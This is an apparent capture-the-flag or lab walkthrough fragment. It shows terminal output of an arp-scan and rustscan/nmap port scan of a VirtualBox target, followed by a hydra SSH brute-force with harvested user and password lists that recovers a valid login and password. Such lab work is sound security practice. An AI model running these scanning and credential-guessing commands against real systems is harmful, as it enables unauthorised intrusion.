15 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.042 seconds (125.37 hosts/sec). 4 responded ❯ export ip=192.168.60.163 ❯ rustscan -a $ip .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- 🌍HACK THE PLANET🌍 [~] The config file is expected to be at "/home/Pepster/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 192.168.60.163:22 Open 192.168.60.163:79 Open 192.168.60.163:80 [~] Starting Script(s) [~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 15:53 CST Initiating ARP Ping Scan at 15:53 Scanning 192.168.60.163 [1 port] Completed ARP Ping Scan at 15:53, 0.08s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 15:53 Completed Parallel DNS resolution of 1 host. at 15:53, 0.01s elapsed DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 15:53 Scanning 192.168.60.163 [3 ports] Discovered open port 79/tcp on 192.168.60.163 Discovered open port 22/tcp on 192.168.60.163 Discovered open port 80/tcp on 192.168.60.163 Completed SYN Stealth Scan at 15:53, 0.09s elapsed (3 total ports) Nmap scan report for 192.168.60.163 Host is up, received arp-response (0.00049s latency). Scanned at 2025-01-22 15:53:39 CST for 0s
PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 64 79/tcp open finger syn-ack ttl 64 80/tcp open http syn-ack ttl 64 MAC Address: 08:00:27:92:CD:A4 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds Raw packets sent: 4 (160B) | Rcvd: 4 (160B)
❯ cat user.txt|awk '{print $2}'|tr -d '"'>users.txt ❯ cat user.txt|awk '{print $3}'|tr -d '"'>pass.txt ❯ hydra -L users.txt -P pass.txt ssh://192.168.60.163 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-22 16:51:21 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries (l:4/p:4), ~1 try per task [DATA] attacking ssh://192.168.60.163:22/ [22][ssh] host: 192.168.60.163 login: seth password: xqRu08ZA3BihR4lKdJVYcP1x6HjZUf 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-22 16:51:37